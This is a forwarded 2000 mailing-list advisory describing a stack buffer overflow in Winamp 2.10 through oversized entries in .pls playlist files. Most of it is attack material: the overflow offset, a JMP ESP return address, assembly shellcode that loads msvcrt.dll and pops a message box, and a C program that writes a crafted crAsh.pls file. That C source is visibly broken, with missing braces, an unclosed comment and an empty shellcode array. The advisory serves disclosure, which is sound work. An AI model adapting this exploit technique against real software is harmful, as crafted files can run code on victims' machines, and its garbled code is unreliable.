-----Original Message-----
From: darkplan [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, January 04, 2000 4:15 PM
Subject: Winamp buffer overflow advisory

Nullsoft Winamp 2.10 buffer overflow advisory
Author: Steve Fewer, [EMAIL PROTECTED]


I recently uncovered a stack based buffer overflow in winamp
version 2.10 which lets me execute 'arbitrary code'. It is 
carried out through .pls files which winamp uses for playlists. 
This is unnerving as it is a feasible plan to trade playlists on
irc during a mp3 trading session with someone.

The overflow occurs when an entry greater than 580 bytes is 
read in from a .pls file. The EIP is the only register overwritten 
in the next four bytes that follow, from there on is space for 
your shell code. eg.

File1=<580 bytes><eip><shell code>

The first 580 bytes get mangled around in memory but the 585 
byte (where our shell code starts) is pointed to by the ESP, 
therefore a simple 'JMP ESP' or the like will land us back in 
our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in 
comctl32.dll which winamp loads. Pointing our EIP into that 
address lands us back where we want to be. 

This was all created/tested on Windows 98 [Version 4.10.1998]
running on an Intel PII400 with 128MB RAM.

The Shell Code:

The shell code I wrote for this simply displays a message box 
and then calls exit(). However Winamp doesn't load msvcrt.dll 
which is needed to call exit() so we have to load it ourselves. 
I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for
LoadLibraryA(). For calling Messagebox I used the address 
0xBFF5412E in user32.dll (v4.10.1998) and for calling exit() I 
used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It 
didn't warrant using GetProcAddress for compatibilities sake.
For the OP codes see the exploit further on.

    // This loads msvcrt.dll
    push ebp
    mov ebp,esp
    xor eax,eax
    push eax
    push eax
    push eax
    mov byte ptr[ebp-0Ch],4Dh
    mov byte ptr[ebp-0Bh],53h
    mov byte ptr[ebp-0Ah],56h
    mov byte ptr[ebp-09h],43h
    mov byte ptr[ebp-08h],52h
    mov byte ptr[ebp-07h],54h
    mov byte ptr[ebp-06h],2Eh
    mov byte ptr[ebp-05h],44h
    mov byte ptr[ebp-04h],4Ch
    mov byte ptr[ebp-03h],4Ch
    mov edx,0xBFF776D4
    push edx
    lea eax,[ebp-0Ch]
    push eax
    call dword ptr[ebp-10h]
    // This calls MessageBox to say 'Hi!'
    push ebp
    mov ebp,esp
    xor edi,edi
    push edi
    mov byte ptr[ebp-04h],48h
    mov byte ptr[ebp-03h],69h
    mov byte ptr[ebp-02h],21h
    mov edx, 0xBFF5412E
    push edx
    push edi
    lea edx,[ebp-04h]
    push edx
    push edx
    push edi
    call dword ptr[ebp-08h]
    // This calls exit()
    push ebp
    mov ebp,esp
    mov edx,0xFFFFFFFF
    sub edx,0x87FFAAFB
    push edx
    xor eax,eax
    push eax
    call dword ptr[ebp-04h]

The Exploit:


/* Stack based buffer overflow exploit for Winamp v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at [EMAIL PROTECTED]
 * For a detailed description on the exploit see my advisory.
 * Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 with 128MB RAM

#include <stdio.h>

int main()

    printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
    printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");

char buffer[640];
char eip[8] = "\xF7\xCF\xB9\xBF";
char sploit[256] =

FILE *file;

    for(int x=0;x<580;x++)
    buffer[x] = 0x90;

file = fopen("crAsh.pls","wb");

fprintf(file, "[playlist]\n");
fprintf(file, "File1=");
fprintf(file, "%s", buffer);
fprintf(file, "%s", eip);
fprintf(file, "%s", sploit);
fprintf(file, "\nNumberOfEntries=1");

printf("\t     created file crAsh.pls loaded with the exploit.\n");
return 0;




NetTek Ltd tel +44-(0)20 7483 1169 fax +44-(0)20 7483 2455
Flat 2,   43 Howitt Road,   Belsize Park,   London NW3 4LU
   Epage [EMAIL PROTECTED] [body of text only]


Reply via email to